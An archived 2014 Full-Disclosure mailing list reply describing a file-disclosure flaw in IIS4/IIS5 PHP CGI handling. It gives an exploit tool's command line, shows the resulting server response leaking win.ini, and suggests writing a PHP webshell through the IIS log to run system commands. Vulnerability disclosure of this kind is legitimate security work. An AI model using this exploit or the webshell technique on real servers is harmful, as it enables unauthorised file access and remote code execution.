| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Thu, 10 Apr 2014 02:25:45 +0000 From: yuange <yuange1975@...mail.com> To: Kirils Solovjovs <kirils.solovjovs@...ils.com>, "fulldisclosure@...lists.org" <fulldisclosure@...lists.org> Subject: Re: [FD] iis cgi 0day Discovered in 2000 for IIS4\IIS5 0day. .php -> php.exe the exploit file ver 4.1.1 . http://seclists.org/fulldisclosure/2012/Apr/13 usage: iisexp411 127.0.0.1 /AprilFools'Day.php PATH_TRANSLATED c:\windows\win.ini yuan can get the file c:\windows\win.ini HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 10 Apr 2014 02:11:37 GMT Connection: close X-Powered-By: PHP/4.0.0 Content-type: text/html ; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1 [MCI Extensions.BAK] asf=MPEGVideo asx=MPEGVideo ivf=MPEGVideo m3u=MPEGVideo mp2v=MPEGVideo mp3=MPEGVideo mpv2=MPEGVideo wax=MPEGVideo wm=MPEGVideo wma=MPEGVideo wmv=MPEGVideo wvx=MPEGVideo [SciCalc] layout=0 You can use the IIS log file write phpshell, execute the PHP call system cmd. > Date: Wed, 9 Apr 2014 23:11:28 +0300 > From: kirils.solovjovs@...ils.com > To: yuange1975@...mail.com > Subject: Re: [FD] iis cgi 0day > > Sorry, I don't read Chinese. > How is this a 0day? > > -- > Kirils Solovjovs _______________________________________________ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists